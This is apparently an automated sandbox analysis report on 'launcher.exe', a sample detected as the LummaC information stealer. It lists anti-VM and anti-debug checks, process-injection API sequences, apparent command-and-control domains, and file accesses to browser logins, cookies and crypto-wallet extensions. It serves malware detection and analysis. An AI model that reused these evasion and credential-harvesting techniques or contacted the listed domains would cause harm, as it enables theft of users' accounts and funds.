Source: C:\Users\user\Desktop\launcher.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: launcher.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: launcher.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: launcher.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: launcher.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: launcher.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: launcher.exe

Static PE information: real checksum: 0x88a9b should be: 0x9038a

Source: C:\Users\user\Desktop\launcher.exe	Code function: 0_2_00B3FB83 push ecx; ret	0_2_00B3FB96
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00445AF0 push 910125E9h; ret	3_2_00445AF5
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00445295 pushfd ; iretd	3_2_004453FB
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0043CD50 push eax; mov dword ptr [esp], E2EDECDFh	3_2_0043CD52
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00442562 push cs; retf	3_2_00442563
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00439DE0 push eax; mov dword ptr [esp], 16171011h	3_2_00439DEE
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_0042E5E1 push ecx; ret	3_2_0042E5E4
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_004455B7 pushfd ; ret	3_2_004455D2
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00B3FB83 push ecx; ret	3_2_00B3FB96

Source: C:\Users\user\Desktop\launcher.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\launcher.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\launcher.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\launcher.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\launcher.exe

Window / User API: threadDelayed 6533

Jump to behavior

Source: C:\Users\user\Desktop\launcher.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-20865

Source: C:\Users\user\Desktop\launcher.exe

API coverage: 9.7 %

Source: C:\Users\user\Desktop\launcher.exe TID: 7136	Thread sleep time: -210000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe TID: 6656	Thread sleep count: 6533 > 30			Jump to behavior

Source: C:\Users\user\Desktop\launcher.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\Desktop\launcher.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\launcher.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\launcher.exe	Code function: 0_2_00B51FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00B51FE9
Source: C:\Users\user\Desktop\launcher.exe	Code function: 0_2_00B51F38 FindFirstFileExW,	0_2_00B51F38
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00B51FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	3_2_00B51FE9
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00B51F38 FindFirstFileExW,	3_2_00B51F38

Source: launcher.exe, 00000003.00000003.2088310000.0000000005C50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: launcher.exe, 00000003.00000003.2088310000.0000000005C50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: launcher.exe, 00000003.00000003.2088310000.0000000005C50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: launcher.exe, 00000003.00000003.2088310000.0000000005C50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: launcher.exe, 00000003.00000003.2088182965.0000000005CC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: launcher.exe, 00000003.00000003.2088310000.0000000005C50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: launcher.exe, 00000003.00000003.2824320926.0000000003517000.00000004.00000020.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2824657051.0000000003517000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWau
Source: launcher.exe, 00000003.00000003.2088310000.0000000005C50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: launcher.exe, 00000003.00000003.2824320926.0000000003517000.00000004.00000020.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2824657051.0000000003517000.00000004.00000020.00020000.00000000.sdmp, launcher.exe, 00000003.00000002.3279695596.00000000034D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: launcher.exe, 00000003.00000003.2088310000.0000000005C50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: launcher.exe, 00000003.00000003.2088310000.0000000005C50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: launcher.exe, 00000003.00000003.2088310000.0000000005C50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: launcher.exe, 00000003.00000003.2088310000.0000000005C50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: launcher.exe, 00000003.00000003.2088310000.0000000005C50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: launcher.exe, 00000003.00000003.2088310000.0000000005C50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: launcher.exe, 00000003.00000003.2088310000.0000000005C50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: launcher.exe, 00000003.00000003.2088310000.0000000005C50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: launcher.exe, 00000003.00000003.2088310000.0000000005C50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: launcher.exe, 00000003.00000003.2088310000.0000000005C50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: launcher.exe, 00000003.00000003.2088310000.0000000005C50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: launcher.exe, 00000003.00000003.2088310000.0000000005C50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: launcher.exe, 00000003.00000003.2088310000.0000000005C50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: launcher.exe, 00000003.00000003.2088310000.0000000005C50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: launcher.exe, 00000003.00000003.2088310000.0000000005C50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: launcher.exe, 00000003.00000003.2088310000.0000000005C50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: launcher.exe, 00000003.00000003.2088310000.0000000005C50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: launcher.exe, 00000003.00000003.2088310000.0000000005C50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: launcher.exe, 00000003.00000003.2088310000.0000000005C50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: launcher.exe, 00000003.00000003.2088310000.0000000005C50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: launcher.exe, 00000003.00000003.2088310000.0000000005C50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: launcher.exe, 00000003.00000003.2088182965.0000000005CC1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: launcher.exe, 00000003.00000003.2088310000.0000000005C50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: launcher.exe, 00000003.00000003.2088310000.0000000005C50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: launcher.exe, 00000003.00000003.2088310000.0000000005C50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: launcher.exe, 00000003.00000003.2088310000.0000000005C50000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\launcher.exe

API call chain: ExitProcess graph end node

graph_3-33811

Source: C:\Users\user\Desktop\launcher.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\launcher.exe

Code function: 3_2_0043B460 LdrInitializeThunk,

3_2_0043B460

Source: C:\Users\user\Desktop\launcher.exe

Code function: 0_2_00B3F8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00B3F8E9

Source: C:\Users\user\Desktop\launcher.exe	Code function: 0_2_00B6A19E mov edi, dword ptr fs:[00000030h]	0_2_00B6A19E
Source: C:\Users\user\Desktop\launcher.exe	Code function: 0_2_00B31FB0 mov edi, dword ptr fs:[00000030h]	0_2_00B31FB0
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00B31FB0 mov edi, dword ptr fs:[00000030h]	3_2_00B31FB0

Source: C:\Users\user\Desktop\launcher.exe

Code function: 0_2_00B4D8E0 GetProcessHeap,

0_2_00B4D8E0

Source: C:\Users\user\Desktop\launcher.exe	Code function: 0_2_00B3F52D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00B3F52D
Source: C:\Users\user\Desktop\launcher.exe	Code function: 0_2_00B3F8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00B3F8E9
Source: C:\Users\user\Desktop\launcher.exe	Code function: 0_2_00B3F8DD SetUnhandledExceptionFilter,	0_2_00B3F8DD
Source: C:\Users\user\Desktop\launcher.exe	Code function: 0_2_00B47E30 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00B47E30
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00B3F52D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00B3F52D
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00B3F8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00B3F8E9
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00B3F8DD SetUnhandledExceptionFilter,	3_2_00B3F8DD
Source: C:\Users\user\Desktop\launcher.exe	Code function: 3_2_00B47E30 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00B47E30

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\launcher.exe

Code function: 0_2_00B6A19E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

0_2_00B6A19E

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\launcher.exe

Memory written: C:\Users\user\Desktop\launcher.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: launcher.exe, 00000000.00000002.2017399182.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: hummskitnj.buzz
Source: launcher.exe, 00000000.00000002.2017399182.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: cashfuzysao.buzz
Source: launcher.exe, 00000000.00000002.2017399182.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: appliacnesot.buzz
Source: launcher.exe, 00000000.00000002.2017399182.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: screwamusresz.buzz
Source: launcher.exe, 00000000.00000002.2017399182.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: inherineau.buzz
Source: launcher.exe, 00000000.00000002.2017399182.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: scentniej.buzz
Source: launcher.exe, 00000000.00000002.2017399182.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: rebuildeso.buzz
Source: launcher.exe, 00000000.00000002.2017399182.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: prisonyfork.buzz
Source: launcher.exe, 00000000.00000002.2017399182.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: stingyerasjhru.click

Source: C:\Users\user\Desktop\launcher.exe

Process created: C:\Users\user\Desktop\launcher.exe "C:\Users\user\Desktop\launcher.exe"

Jump to behavior

Source: C:\Users\user\Desktop\launcher.exe	Code function: EnumSystemLocalesW,	0_2_00B4D1BD
Source: C:\Users\user\Desktop\launcher.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_00B51287
Source: C:\Users\user\Desktop\launcher.exe	Code function: EnumSystemLocalesW,	0_2_00B514D8
Source: C:\Users\user\Desktop\launcher.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_00B51580
Source: C:\Users\user\Desktop\launcher.exe	Code function: EnumSystemLocalesW,	0_2_00B517D3
Source: C:\Users\user\Desktop\launcher.exe	Code function: GetLocaleInfoW,	0_2_00B51840
Source: C:\Users\user\Desktop\launcher.exe	Code function: EnumSystemLocalesW,	0_2_00B51915
Source: C:\Users\user\Desktop\launcher.exe	Code function: GetLocaleInfoW,	0_2_00B51960
Source: C:\Users\user\Desktop\launcher.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_00B51A07
Source: C:\Users\user\Desktop\launcher.exe	Code function: GetLocaleInfoW,	0_2_00B51B0D
Source: C:\Users\user\Desktop\launcher.exe	Code function: GetLocaleInfoW,	0_2_00B4CC15
Source: C:\Users\user\Desktop\launcher.exe	Code function: EnumSystemLocalesW,	3_2_00B4D1BD
Source: C:\Users\user\Desktop\launcher.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_00B51287
Source: C:\Users\user\Desktop\launcher.exe	Code function: EnumSystemLocalesW,	3_2_00B514D8
Source: C:\Users\user\Desktop\launcher.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	3_2_00B51580
Source: C:\Users\user\Desktop\launcher.exe	Code function: EnumSystemLocalesW,	3_2_00B517D3
Source: C:\Users\user\Desktop\launcher.exe	Code function: GetLocaleInfoW,	3_2_00B51840
Source: C:\Users\user\Desktop\launcher.exe	Code function: EnumSystemLocalesW,	3_2_00B51915
Source: C:\Users\user\Desktop\launcher.exe	Code function: GetLocaleInfoW,	3_2_00B51960
Source: C:\Users\user\Desktop\launcher.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_00B51A07
Source: C:\Users\user\Desktop\launcher.exe	Code function: GetLocaleInfoW,	3_2_00B51B0D
Source: C:\Users\user\Desktop\launcher.exe	Code function: GetLocaleInfoW,	3_2_00B4CC15

Source: C:\Users\user\Desktop\launcher.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\launcher.exe

Code function: 0_2_00B400B4 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,

0_2_00B400B4

Source: C:\Users\user\Desktop\launcher.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: launcher.exe, 00000003.00000003.2160143228.0000000003583000.00000004.00000020.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2160192677.0000000003589000.00000004.00000020.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2163067954.0000000005C9B000.00000004.00000800.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2163224292.0000000003568000.00000004.00000020.00020000.00000000.sdmp, launcher.exe, 00000003.00000003.2160076855.0000000003568000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\launcher.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: launcher.exe PID: 7104, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\launcher.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
